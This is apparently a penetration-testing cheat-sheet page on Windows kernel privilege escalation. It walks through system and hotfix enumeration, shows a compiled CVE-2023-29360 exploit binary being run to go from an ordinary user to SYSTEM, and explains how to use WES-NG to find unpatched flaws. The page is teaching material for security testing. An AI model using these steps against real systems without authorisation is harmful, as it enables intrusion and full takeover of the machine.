# Kernel **Kernel exploits** aim to leverage Windows kernel vulnerabilities and typically result in high privileges, but requires advanced knowledge and carries a high risk of crashing the system. {% tabs %} {% tab title="1. System Info" %} ```powershell > systeminfo Host Name: CLIENTWK220 OS Name: Microsoft Windows 11 Pro OS Version: 10.0.22621 N/A Build 22621 ... ``` {% endtab %} {% tab title="2. Hotfixes" %} {% code overflow="wrap" %} ```powershell # enumerate security patches > Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" } Source Description HotFixID InstalledBy InstalledOn ------ ----------- -------- ----------- ----------- Security Update KB5025239 5/4/2023 12:00:00 AM Security Update KB5025749 5/4/2023 12:00:00 AM Security Update KB5017233 9/25/2022 12:00:00 AM ``` {% endcode %} {% endtab %} {% tab title="3. Exploit" %} {% code overflow="wrap" %} ```powershell > whoami clientwk220\steve > .\CVE-2023-29360.exe [+] Device Description: Microsoft Streaming Service Proxy Hardware IDs: "SW\{96E080C7-143C-11D1-B40F-00A0C9223196}" [+] Device Instance ID: SW\{96E080C7-143C-11D1-B40F-00A0C9223196}\{3C0D501A-140B-11D1-B40F-00A0C9223196} [+] First mapped _MDL: 20c2f3c00c0 [+] Second mapped _MDL: 20c2f3d0040 [+] Unprivileged token reference: ffffbc053be6d06d [+] System token reference: ffffbc052ea7d496 Microsoft Windows [Version 10.0.22621.1555] (c) Microsoft Corporation. All rights reserved. >whoami nt authority\systemower ``` {% endcode %} {% endtab %} {% endtabs %} > *Vulnerabities on Windows OS systems can be found on the* [*Security Update Guide*](https://msrc.microsoft.com/update-guide/)*, such as* [*CVE-2023-29360*](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29360)*, and their corresponding security updates can be shown on the* [*Microsoft Update Catalog*](https://catalog.update.microsoft.com/Search.aspx?q=KB5027231) *page.* ## WES-NG [Windows Exploit Suggester – Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) is a post-exploitation tool that analyzes Windows system information to identify unpatched vulnerabilities and associated exploits. It supports all Windows OSs from XP through Windows 11, including server editions. ```bash # Clone the repo git clone https://github.com/bitsadmin/wesng --depth 1 # Update wes.py --update # systeminfo > systeminfo.txt on the target host wes.py systeminfo.txt -e ``` This tool can generate a lot of false positives: make sure to check [here](https://github.com/bitsadmin/wesng/wiki/Eliminating-false-positives) how to eliminate them. The tool can also validate findings against Microsoft’s Update Catalog using the `--muc-lookup` option to reduce false positives, as the raw MSRC feed can be incomplete.